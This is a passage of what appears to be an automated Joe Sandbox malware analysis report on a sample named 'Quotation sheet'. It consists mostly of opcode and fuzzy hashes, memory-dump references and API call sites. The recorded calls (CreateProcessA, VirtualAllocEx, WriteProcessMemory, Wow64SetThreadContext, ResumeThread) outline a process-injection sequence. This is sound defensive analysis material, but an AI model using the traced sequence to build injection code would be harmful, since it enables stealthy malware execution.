                                                                                                                        • Instruction Fuzzy Hash: A1528038B01119DFDB14DF69C4A4A6EBBB2FF88750B16816AF8059B364DB35EC41CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 349ead32d21b227df55d97c51306bbc04510155fce7178b223688b3fa74e248b
                                                                                                                        • Instruction ID: baa188a84b508118122dd18251602a5ff7fb4e94b374f297468127ff388748e5
                                                                                                                        • Opcode Fuzzy Hash: 349ead32d21b227df55d97c51306bbc04510155fce7178b223688b3fa74e248b
                                                                                                                        • Instruction Fuzzy Hash: 3FE1B0B1B012058FDB15EF79C454BAEB7FAAF98700F14446DD14ADB2A0DB35E801CB61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a5510944d60348af4eda47a8aa3e18fc1f8d813a6be7f7ad43f5cce19aeadb79
                                                                                                                        • Instruction ID: 6d125d0c5e97e322c22b6422706888ac4e7cde0c2030705d1bd0050bdd83b3ca
                                                                                                                        • Opcode Fuzzy Hash: a5510944d60348af4eda47a8aa3e18fc1f8d813a6be7f7ad43f5cce19aeadb79
                                                                                                                        • Instruction Fuzzy Hash: 394127B1D0461C8BEB18CFAAC8497DEBBF6BF99304F04C06AD509A6254DB7449858F90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cc5f040b7057789ef01f5b01b116da6f498d6cce907f55b1b08e59f0ee000675
                                                                                                                        • Instruction ID: f6670a56ab843a2815166534666d8bb9baf5419fd6a80afe9088a936a129ac8f
                                                                                                                        • Opcode Fuzzy Hash: cc5f040b7057789ef01f5b01b116da6f498d6cce907f55b1b08e59f0ee000675
                                                                                                                        • Instruction Fuzzy Hash: 4C4107B1D0421CCBEB58CFAAC8487EEFAF6BF99304F04C06AD509A6254DB7449858F50

Control-flow Graph (first node 78c882f-78c88cd; legend: Executed / Not Executed)
                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 078C8A6E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 963392458-0
                                                                                                                        • Opcode ID: b0c9897d950e03dce17aacdf145eaa0568f4a731ea17d24abb235045055311cf
                                                                                                                        • Instruction ID: 1deaec26c90426bf0626c6bcf2de1c1874e5220913cf762eb0ca63f6fbf336b6
                                                                                                                        • Opcode Fuzzy Hash: b0c9897d950e03dce17aacdf145eaa0568f4a731ea17d24abb235045055311cf
                                                                                                                        • Instruction Fuzzy Hash: E29139B1D0021ADFEB24CF68C841BDDBBB2BF48314F1485A9E849A7240DB759985CF92

Control-flow Graph (first node 78c8838-78c88cd; legend: Executed / Not Executed)
                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 078C8A6E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 963392458-0

                                                                                                                        APIs
                                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 078C855E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0

                                                                                                                        APIs
                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,059DF6DD,?,?), ref: 059DF78F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2352504395.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_59d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DrawText
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2175133113-0

                                                                                                                        APIs
                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 078C8640
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3559483778-0

                                                                                                                        APIs
                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,059DF6DD,?,?), ref: 059DF78F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2352504395.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_59d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DrawText
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2175133113-0

                                                                                                                        APIs
                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 078C8640
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3559483778-0

                                                                                                                        APIs
                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078C805E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 983334009-0

                                                                                                                        APIs
                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 078C8720
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1726664587-0

                                                                                                                        APIs
                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 078C8720
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1726664587-0

                                                                                                                        APIs
                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078C805E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 983334009-0

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 537 78c84f0-78c856b VirtualAllocEx 540 78c856d-78c8573 537->540 541 78c8574-78c8599 537->541 540->541
                                                                                                                        APIs
                                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 078C855E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 545 59d4ea8-59d552a SetTimer 547 59d552c-59d5532 545->547 548 59d5533-59d5547 545->548 547->548
                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(?,01A56428,?,?,?,?,?,?,059D5378,00000000,00000000,?), ref: 059D551D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2352504395.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_59d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Timer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2870079774-0
                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(?,01A56428,?,?,?,?,?,?,059D5378,00000000,00000000,?), ref: 059D551D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2352504395.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_59d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Timer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2870079774-0
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 078CC205
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 410705778-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 078CC205
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 410705778-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0
                                                                                                                        • Opcode Fuzzy Hash: 3e5b6d37ccf9856ba5f2eba0697c5129152480f5e643058ce31e417608e7c6a5
                                                                                                                        • Instruction Fuzzy Hash: AB711D78E06208DFCB14DFA4D4946BEBBB6FB89300F10912AE416A7755DB345D06CBD0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 56c6fb840ae0889296471e3d1cc4f95641e5e98bc97f05d9528e52a55b1ee92c
                                                                                                                        • Instruction ID: 0849350a1c84d8bd520d6fc3b7564705432fa5fea0be10d110d050356de6317d
                                                                                                                        • Opcode Fuzzy Hash: 56c6fb840ae0889296471e3d1cc4f95641e5e98bc97f05d9528e52a55b1ee92c
                                                                                                                        • Instruction Fuzzy Hash: C3710878E06218DFCB14DFA4E4986BEBBB6FB89300F105129E406A7749DB385D06CBD0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5a5670b6511c7148ada94850da36a3bb67f46aa316ecacfa51babbbeea59d838
                                                                                                                        • Instruction ID: 56c99af0450ee9d31a73c7f2079a432c48bc081f75477a48571566f590ed6181
                                                                                                                        • Opcode Fuzzy Hash: 5a5670b6511c7148ada94850da36a3bb67f46aa316ecacfa51babbbeea59d838
                                                                                                                        • Instruction Fuzzy Hash: CF512478D0A219CFDF10CFE5C5A46EDBBBAEF4A300F10A21AE50AA7781D7355946CB40
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: be46bcc56baa50f4507f0f4736a8a05b0fdd4cb2fbd65cd8ca6f4a0be743f29f
                                                                                                                        • Instruction ID: 9e61c0b6278599ed8a1560ffe43a1f02a0740adc7e9040b5e1f8ddd0dcf83b09
                                                                                                                        • Opcode Fuzzy Hash: be46bcc56baa50f4507f0f4736a8a05b0fdd4cb2fbd65cd8ca6f4a0be743f29f
                                                                                                                        • Instruction Fuzzy Hash: F041B878E0651A9FDB15AF65C8797AB7BF0FB44B40F104427E822EB354F6B2CD118A90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 763964a63d94f8bdd54a8d7abc47649647f4eba46d5c231bb6643751d8efd909
                                                                                                                        • Instruction ID: 8f0612791a734eacfe9cf94f547b2a40aafe7a52c688bf1674776505352fe1a6
                                                                                                                        • Opcode Fuzzy Hash: 763964a63d94f8bdd54a8d7abc47649647f4eba46d5c231bb6643751d8efd909
                                                                                                                        • Instruction Fuzzy Hash: 7A411978E0621A9FCB16AF64C8796AB7BF0FB05740F100457E852AB355F6B28D12CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0dafbdffeb6a2a15be496c9336cd73628c705d70b02d9535589259a6a8c02269
                                                                                                                        • Instruction ID: a97f3eb6aebeb5b2e8e24daf1689f6b54a4031703be198878b1eeec29137c2df
                                                                                                                        • Opcode Fuzzy Hash: 0dafbdffeb6a2a15be496c9336cd73628c705d70b02d9535589259a6a8c02269
                                                                                                                        • Instruction Fuzzy Hash: 07412A78D0A258CFDB10DFE5C0A46EEBBB5FB0A311F10919AD009BB206D7319886CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e6eb71c0a4d5c8546b5ca5ceaad1a20d01ecdd0ac0c738996cd95cd44f053c76
                                                                                                                        • Instruction ID: 59c3da357c1a8139a499d55380015bfafb79a3309f741aafe8dfce5f31663654
                                                                                                                        • Opcode Fuzzy Hash: e6eb71c0a4d5c8546b5ca5ceaad1a20d01ecdd0ac0c738996cd95cd44f053c76
                                                                                                                        • Instruction Fuzzy Hash: 68414034A152089FDB14DF69D864AADBBB2EF89310F14856AF801BB3A0DB74ED40CB50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7dd22133764cab6cfbd9264fa65688f5168212cdfda61b59a90640d98dd9ce68
                                                                                                                        • Instruction ID: 6de414583420f0645d3f9f2aab8ae5ea534104919dd7bc6813889cec12c36b6f
                                                                                                                        • Opcode Fuzzy Hash: 7dd22133764cab6cfbd9264fa65688f5168212cdfda61b59a90640d98dd9ce68
                                                                                                                        • Instruction Fuzzy Hash: 18415334A152089FDB14DFA9D864A9DBBF2EF89310F14816AF401BB3A0DB74ED41CB50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 974275023f9db99f3936b30a04be9f50cae2b5a4d76e15e8303778e8d04c6283
                                                                                                                        • Instruction ID: 01c82fbbf5ce2ce3e1ee446499c864f88c1b490a180efc12b5a7ea83d974a8ec
                                                                                                                        • Opcode Fuzzy Hash: 974275023f9db99f3936b30a04be9f50cae2b5a4d76e15e8303778e8d04c6283
                                                                                                                        • Instruction Fuzzy Hash: 94412634A0111ADFDB059FA4D854AAEBBA6FF88754F148029F8059B394DB349D52CBE0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 42c8d460a0416222bdbedfedd08f3f341544e2c576b8cbd428668b3c0e07e11e
                                                                                                                        • Instruction ID: cb706970fb9e5e79bfcc4a432c31b6f3a4de734dba4d23fda90fc0040b3dcd22
                                                                                                                        • Opcode Fuzzy Hash: 42c8d460a0416222bdbedfedd08f3f341544e2c576b8cbd428668b3c0e07e11e
                                                                                                                        • Instruction Fuzzy Hash: 9A412571E05218DFEB259FA5D9985ADFFB2FF88300F21815AD8457B255DB3188A1CF40
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 88235620af2c05d767bb3f98029dae6723110d4a4046e72f8673fcc95a73b310
                                                                                                                        • Instruction ID: 8dd0c54206d16aeacc4e4fa8784a88dfaedb70d8bdef0b59e1f2aaa1826f2200
                                                                                                                        • Opcode Fuzzy Hash: 88235620af2c05d767bb3f98029dae6723110d4a4046e72f8673fcc95a73b310
                                                                                                                        • Instruction Fuzzy Hash: 00418D78E16208DFDB24DFA9D4546EEBBF6EF89300F0090A6E416A7350DB359945CFA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: eca37005f8a5fd5f800c6281bd60d5a417c984a5ed860009e4664adcd1bb3b0a
                                                                                                                        • Instruction ID: b0560b9e1dc95f8cbcd8e8d91acf81a897d092dc8f78bf125b687bc82ed9e5db
                                                                                                                        • Opcode Fuzzy Hash: eca37005f8a5fd5f800c6281bd60d5a417c984a5ed860009e4664adcd1bb3b0a
                                                                                                                        • Instruction Fuzzy Hash: BE413D78E06219EBDB04DFA9D8946EEBBF6FF89300F10912AE409A7794C7345D41CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: db05c332d2561005238d0557c83bfb99f849ed63be2011ad696f8b640980e80b
                                                                                                                        • Instruction ID: d394752c3ff9b4102f0b84abf1cb456eebd2ab0bd2cbddb329ca409efb01266a
                                                                                                                        • Opcode Fuzzy Hash: db05c332d2561005238d0557c83bfb99f849ed63be2011ad696f8b640980e80b
                                                                                                                        • Instruction Fuzzy Hash: 4B415B78E16208DFDB14DFA9D4506EEBBF6EF89300F1090A6E816A7350DB359945CFA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dd02a744499405560343d44089336c82a18b8db43257f6f88dc05668e129189c
                                                                                                                        • Instruction ID: 3cac5aaf97854eaddd4d0f686feb9be5b1d1684dfb346f01e1ac64f824f9616c
                                                                                                                        • Opcode Fuzzy Hash: dd02a744499405560343d44089336c82a18b8db43257f6f88dc05668e129189c
                                                                                                                        • Instruction Fuzzy Hash: 99413C78E06219EBDB04DFA9D8556EEBBB6FB89300F00912AE409A7795C7345D41CF90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bab2c23121d45c5ad77f9a1d180a92a3f9644be56cbe4fe72fd6c211c6839739
                                                                                                                        • Instruction ID: b97efbb8fa3029ce23c3333e77ae8a353514ce43c1aa991aeece1db19737d034
                                                                                                                        • Opcode Fuzzy Hash: bab2c23121d45c5ad77f9a1d180a92a3f9644be56cbe4fe72fd6c211c6839739
                                                                                                                        • Instruction Fuzzy Hash: 523134B69002099FCF14CFA9C845A9EBFF5EB48320F10846AE909A7350D775A904CBA4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2336953708.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2337021809.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false
                                                                                                                        • Instruction ID: be7b093cc5fb61c15357f0f5d49ae80e6765a86b4a17bfe4cd0f785ebea7adb3
                                                                                                                        • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                        • Instruction Fuzzy Hash: 6B119D76504280CFCB16CF54D5C4B16BF62FB84218F2486A9D8490B657C33AD556CBA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2336953708.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_173d000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                        • Instruction ID: 08430fa876a6d7fff283275d2033413f2c37401edc4508e051983a297683eb9b
                                                                                                                        • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                        • Instruction Fuzzy Hash: 8311CDB6404280CFCB12CF54D5C0B56BF62FB84224F2482A9DC090A257C33AE456CBA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
